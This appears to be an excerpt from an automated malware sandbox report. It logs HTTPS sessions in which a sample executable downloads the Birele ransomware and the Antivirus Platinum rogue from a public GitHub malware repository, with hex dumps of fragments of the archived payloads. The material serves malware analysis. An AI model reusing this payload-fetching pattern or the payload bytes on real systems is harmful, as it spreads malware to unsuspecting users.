                                                                                                        2022-09-29 12:46:05 UTC8895INData Raw: 80 c8 34 a3 75 09 a6 ff 2f 4e 3e d7 5b f8 09 88 76 d1 f1 7b 8b 44 52 01 ce 42 4f 27 76 e3 c6 e0 29 3a ff da f3 aa 6f c6 bb 70 e6 9a 8f 47 42 bf 0d 7c de 95 08 1d 2d 2f aa 1b 07 83 7c 54 05 c3 c3 34 17 3f a6 45 c4 14 77 b1 c1 d9 af d0 17 c8 a3 1b c1 ac a0 f2 07 2f 7d 29 3f 44 62 64 7e a0 dc e0 ec fc 74 c2 c0 94 a6 1e 63 3d ef c8 c2 80 8d fa d8 2f c9 3d e7 5b 5d 98 9b bf 35 85 28 e2 f0 6a 5f 95 c6 7b 02 ac 1a 34 05 6d 69 63 3b b5 23 b0 a5 71 42 97 35 bf b6 41 85 cf c9 d0 d7 b1 63 8c 6c 30 67 ca ca 1e a9 19 7f e1 28 dd 09 e4 5f e9 1d 2a be 4c ee 0d 61 18 b1 37 5a f8 7f c2 6e 87 2d 5b 5f f0 9d 6c 35 2b 4d 88 d8 3d 07 63 c8 b7 97 c4 d9 33 e3 ba 43 d4 d4 40 b2 57 2c 9d ce d1 5d 51 36 48 c6 2a 43 57 dc 9f 99 26 fd f9 6f 91 3f 5b 65 a8 7c fd 4f 9f 43 39 6c 18 6f
                                                                                                        Data Ascii: 4u/N>[v{DRBO'v):opGB|-/|T4?Ew/})?Dbd~tc=/=[]5(j_{4mic;#qB5Acl0g(_*La7Zn-[_l5+M=c3C@W,]Q6H*CW&o?[e|OC9lo
                                                                                                        2022-09-29 12:46:05 UTC8911INData Raw: b9 a4 8a 45 d3 c1 71 4f 31 df 0f c8 1d bc ce 04 38 c5 7a 38 59 f1 a5 55 42 bc 7b 59 c5 f0 0f cd 05 4c 5c de e3 d7 05 d5 91 59 b5 13 27 14 26 a7 21 82 f1 39 24 d7 e6 9a 33 7c 9a a0 e2 a0 e7 85 b1 20 90 77 7f 50 fa 24 91 a1 4c 68 43 bc ba 92 d0 c5 f1 dc 2f e5 9e af 42 9d 4a bf 95 09 84 40 c7 76 b6 ea bd e7 fd bc 1e 64 df 3c c8 70 af 72 8d 4b 14 7e 3e 81 22 fd 0a cf 00 87 29 24 7c 1c 83 ec 4c 2c 9e 8d 77 2e f1 34 f9 b0 79 44 d6 b4 9a 26 fb 7a 4d d7 8b ad 48 2c 82 92 15 10 bf b4 02 00 45 ed dd 3e c4 4b a2 a9 4a ba 75 c7 23 0c 46 b3 e9 5e 80 84 54 00 22 15 d0 05 0a 79 0f a6 c4 1c 65 1d b1 a1 ec cd 6d 9c 24 72 c1 0d 8f 68 97 74 73 d5 91 8b dd 2a c6 cb 9a 6a ed a3 f5 60 8b dd 84 23 fe 3b 27 91 3d bc a0 29 7d b3 71 99 39 3d fb 57 bf 26 d8 c2 f2 b3 25 c9 9b eb fa
                                                                                                        Data Ascii: EqO18z8YUB{YL\Y'&!9$3| wP$LhC/BJ@vd<prK~>")$|L,w.4yD&zMH,E>KJu#F^T"yem$rhts*j`#;'=)}q9=W&%
                                                                                                        2022-09-29 12:46:05 UTC8927INData Raw: c0 34 71 55 6c a7 47 80 03 bd 1e 2d d9 39 fc 19 cf 93 2b 49 61 bc 19 ca 96 0c a9 10 83 39 c7 42 ee ee 3d 9b b8 58 db fe 5e c4 6f a7 ba 1f a9 f2 fd 3e 65 c8 fe 9e ef db e1 88 14 3d 39 c1 dd 25 52 0c 1a 90 d6 1e 29 92 bb 59 03 d2 cf 89 81 92 3d 69 55 30 5b a9 9d 9a d0 e7 54 32 eb 3e 7c 1c 08 83 57 62 0f b5 5d 1e 91 c7 26 fb 05 26 1e 52 32 9e a0 3a be 46 6b 7d b1 d5 4f 7e 0d 9c ab 05 e5 62 08 d2 fa 71 82 3c 3b e3 3c 25 bc a5 29 5b ee 50 a2 d4 14 fe 21 ea cb e7 16 38 63 72 a7 9d 0d c5 a0 23 77 da 65 8e 10 28 1b 23 07 94 66 c9 71 46 3c e1 de a2 ae 66 4b c3 57 f5 44 02 f4 8d 53 a9 30 1c 2e bb 8b 33 10 9b 20 e7 83 0f fb 3c e4 cf 81 04 6e d5 3b fe a9 3f ba 30 39 0a 3c 17 86 b8 48 e8 16 b7 f7 73 c4 53 f4 f6 e4 57 21 02 56 88 42 89 97 06 b3 20 dc 3b fa 62 ba 84 4c
                                                                                                        Data Ascii: 4qUlG-9+Ia9B=X^o>e=9%R)Y=iU0[T2>|Wb]&&R2:Fk}O~bq<;<%)[P!8cr#we(#fqF<fKWDS0.3 <n;?09<HsSW!VB ;bL
                                                                                                        2022-09-29 12:46:05 UTC8943INData Raw: c2 b1 cb c2 bd 12 8b 63 5d 91 db b3 e5 13 be 76 41 d5 d6 2f 08 3e c1 d5 53 5b 31 ba 0c 08 c5 db 42 4b 17 82 26 6d d4 84 33 c2 50 c3 c1 f6 94 2b ee 15 51 3f fd 1a df 17 56 56 6b 3b ab 2f 47 32 c1 f1 12 14 c9 64 fd 3b f7 6a 6d a8 6f 31 10 83 f1 ed 30 60 7a 11 69 b1 f7 a3 87 f2 f8 eb 08 e4 14 bd f6 1e 61 a0 71 bf e3 20 95 2a 23 e6 8d 9b bf 66 e6 42 7a c5 53 7a 8d a9 6c a6 36 29 1a f9 60 35 77 38 fd fc 0d 36 26 f8 ac 18 da 65 53 92 5b 91 5a 54 75 19 2c 82 9d 25 ca 47 95 08 aa 41 6f 70 24 1e b6 2b 19 22 fa 74 b6 2a 2a 3e 12 1f d8 e1 c4 21 2c 6f 1f 76 4c 66 b5 cf 40 11 94 70 a0 96 7f 40 53 06 7d f7 f6 fb 30 48 4f 99 97 65 08 79 20 9e e9 93 72 b2 85 2a 4f 3c 56 1e 6a ad 78 94 57 78 82 ea 49 26 e5 94 da e7 d2 10 10 37 c4 54 04 d2 8e ce 9a be 66 15 f8 bd 48 2c 70
                                                                                                        Data Ascii: c]vA/>S[1BK&m3P+Q?VVk;/G2d;jmo10`ziaq *#fBzSzl6)`5w86&eS[ZTu,%GAop$+"t**>!,ovLf@p@S}0HOey r*O<VjxWxI&7TfH,p
                                                                                                        2022-09-29 12:46:05 UTC8959INData Raw: 36 d7 a9 89 96 04 c0 63 d1 b0 a4 cb bf d5 95 e8 c9 74 90 42 82 fb b3 50 96 ae ac 50 ca 74 24 49 53 d8 fa d3 99 25 3a 34 b1 95 9c f1 39 19 32 74 f9 73 91 55 51 58 35 f5 6c 9d 0b 72 f7 d2 40 27 1f 71 85 ee 08 ca 20 b7 68 5f d8 42 df 50 7b c2 72 1b 16 55 35 76 a1 f0 28 0f 88 f6 4b e2 43 73 26 70 93 d3 18 23 11 07 36 7a 47 52 1f dd 78 f0 9d f8 37 f7 a6 8a 7a 56 f0 99 18 1f c2 e0 18 29 8a 37 3c 28 3b 28 f6 7d cc d7 c0 49 98 59 32 24 8f 75 37 ce 7a 75 b5 63 1d 73 8a 62 2e fa 1c 00 b1 60 62 18 ea 21 cd 3b 5f 73 18 5d 4a c2 a1 dd 2f a0 1d a4 6d ef dc 31 0b 21 4a 4f 30 6e df 7d 9f 9c c7 c6 e8 a5 6e 25 5b 99 50 7e a1 fa 2c fc b4 c2 6a 3f 15 0a 92 43 8c fc 49 a7 04 73 49 35 c9 7c 8e 73 22 ab e9 87 d5 16 b9 4a db 44 81 f1 8f 7a 13 89 71 33 1a 7c 26 0c 72 b8 8f 8c c6
                                                                                                        Data Ascii: 6ctBPPt$IS%:492tsUQX5lr@'q h_BP{rU5v(KCs&p#6zGRx7zV)7<(;(}IY2$u7zucsb.`b!;_s]J/m1!JO0n}n%[P~,j?CIsI5|s"JDzq3|&r
                                                                                                        2022-09-29 12:46:05 UTC8975INData Raw: 3c 64 c9 83 e2 49 75 fb 3a a8 65 16 b3 e2 96 f7 b2 3c 3e b0 ef f6 b6 db e4 56 96 a1 8c b4 32 25 bc f8 9e 4d 96 99 f3 47 b6 6c 0a e7 c7 b6 6d f3 79 7b c0 b5 38 a5 c7 85 9d 46 e2 1f 6b e7 0c 80 d8 2e 13 a9 71 59 8e c9 e2 92 90 12 e3 43 50 1a f4 b6 59 db 2f e7 ce ae a8 6e a2 5b 84 4e e4 00 39 9b 4c b2 ca ce 52 68 52 1d 3c 00 24 bb d6 64 86 86 2d 25 09 75 4b f5 e6 74 99 e2 c2 c2 e9 63 b3 ca f3 64 11 7b a8 83 ca 23 03 ee 23 d6 c5 60 1f c2 34 05 77 92 a3 23 f4 eb 1c 89 6d 3d b4 6a c3 1f c5 65 28 fa 1c 8c 5a 25 d9 5e 7c 88 e3 78 a4 71 2f f3 c2 65 2b 41 a7 c2 d3 b6 20 14 79 15 e4 77 fa d1 1f 1d 68 07 ef 8f 3f 73 80 f0 f9 54 66 80 72 09 51 dd 67 70 3c 91 55 96 36 97 99 1b 13 b0 73 d4 5c c8 16 a9 10 91 a9 a1 8a d5 eb 25 72 f9 ec d9 e0 24 f6 ba e1 43 49 40 4e 95 d9
                                                                                                        Data Ascii: <dIu:e<>V2%MGlmy{8Fk.qYCPY/n[N9LRhR<$d-%uKtcd{##`4w#m=je(Z%^|xq/e+A ywh?sTfrQgp<U6s\%r$CI@N


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.449710185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:05 UTC399OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:05 UTC399INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 116134
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "591eaf40b2c1654824c7b57ace22a858e557d50f2bd61e6d218bc09b4c052c63"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 33D4:39B3:7C75A4:8A0A06:6335930F
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:05 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6931-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455505.120242,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: a135046717979818ac93b8db0cc34c4a54ab8f2c
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:05 GMT
                                                                                                        Source-Age: 65
                                                                                                        2022-09-29 12:45:05 UTC400INData Raw: 50 4b 03 04 14 00 01 00 08 00 0f b9 98 3f 08 02 e3 81 f6 c4 01 00 00 d2 01 00 15 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 69 72 65 6c 65 2e 65 78 65 78 87 52 7a 1b 81 59 80 6e db ec 5d ee 26 6d 7c 09 66 bf 9b 5b ca c3 1f 74 30 22 7f 86 ac 21 7f ce 7d ef 5b c1 ea 5b 7a d1 dd b0 eb 9b 49 ce 14 14 68 6b 08 48 f5 ec a4 42 03 54 02 12 f6 9d 93 01 c2 cb 0f e2 c9 32 64 50 3b 29 65 4b c7 74 fb 81 69 1a 6f ea cc bb e0 e3 53 1a 43 74 5f 3b 59 df ff a6 59 84 cb 71 1b d4 44 3c e2 d1 f6 be 7b b7 a0 62 95 ae e0 1f d7 0b 6b 49 83 79 23 5c 2d cd 1a 45 47 6d c5 92 5f c5 70 88 d9 7e 4d 94 8b d3 5c a7 b8 c3 66 c3 60 fb 0e 89 2c e7 e4 b3 65 32 70 be fd 5f 58 7b 5e ca c4 22 8d 5e 0f d8 7e 6d 13 c2 f0 ff c8 0a 43 f1 0e ab 32 bd 72 24 c3 10 03 39 3e 75 13 eb 26 26 11 a6 bf
                                                                                                        Data Ascii: PK?Endermanch@Birele.exexRzYn]&m|f[t0"!}[[zIhkHBT2dP;)eKtioSCt_;YYqD<{bkIy#\-EGm_p~M\f`,e2p_X{^"^~mC2r$9>u&&
                                                                                                        2022-09-29 12:45:05 UTC416INData Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42
                                                                                                        Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
                                                                                                        2022-09-29 12:45:05 UTC432INData Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12
                                                                                                        Data Ascii: j[v?AGELw|Q.9|Br[Ky--0gNB|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^|C
                                                                                                        2022-09-29 12:45:05 UTC448INData Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c
                                                                                                        Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
                                                                                                        2022-09-29 12:45:05 UTC464INData Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75
                                                                                                        Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@|v_Hu
                                                                                                        2022-09-29 12:45:05 UTC480INData Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99
                                                                                                        Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
                                                                                                        2022-09-29 12:45:05 UTC496INData Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac
                                                                                                        Data Ascii: Nr\ep\CZco{It:+Smf1T*qN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ*0c^O3L~6|FOL Y[>P#!O)6"To};"Maa
                                                                                                        2022-09-29 12:45:05 UTC512INData Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08
                                                                                                        Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.449773140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:08 UTC8979OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:09 UTC8979INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:46:08 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:09 UTC8980INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.449774185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:09 UTC8982OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:09 UTC8982INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 716432
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "2dd2f92f25598d9ce7015fc31af79216c3c4239d1c9016d16e6d1fa2f0f83264"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 98A4:E4BD:C06779:CC85EC:6335934E
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:09 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6936-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455569.071695,VS0,VE2
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 7cd323f4acba2ecf7edfd53b79b0a1e465e83678
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:09 GMT
                                                                                                        Source-Age: 66
                                                                                                        2022-09-29 12:46:09 UTC8982INData Raw: 50 4b 03 04 14 00 01 00 08 00 c3 50 3e 3c b9 dd 88 28 ca ed 0a 00 85 8f 0b 00 20 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 6c 61 74 69 6e 75 6d 2e 65 78 65 23 1e 4a 14 b1 c4 33 c0 bf 0b ce 01 66 9f a5 a5 fa 94 f3 86 ac 9e 88 9a 72 b7 c5 19 87 bb cc 9c ad 47 32 5b 58 17 8d f5 34 86 d9 16 0f 1c 15 31 7c f1 f6 a3 28 84 c7 dc a1 f4 c8 8e 5a 47 34 b7 d2 b8 58 d0 bd f6 1b 49 18 ba 76 bd e0 c6 eb d6 88 07 41 61 a6 35 34 e4 79 45 10 d7 8c b1 11 4d 68 47 d2 c1 27 14 da 92 65 60 d5 ea 14 a7 93 d9 26 ca 0b ef 17 54 58 41 5c c0 93 12 f1 e2 1b c2 d6 22 7b 35 0e 1d 96 da 55 71 44 a7 69 e1 48 a3 86 1e 19 14 ce cb 01 66 c0 fa c6 d4 f4 c3 8a 40 79 22 00 7d 7b 9e fe b1 e5 df 95 75 bf 90 e9 ea 8d 0d 25 96 56 2f 74 1f d9 2b df 87 3d f2 83 9f 41
                                                                                                        Data Ascii: PKP><( Endermanch@AntivirusPlatinum.exe#J3frG2[X41|(ZG4XIvAa54yEMhG'e`&TXA\"{5UqDiHf@y"}{u%V/t+=A
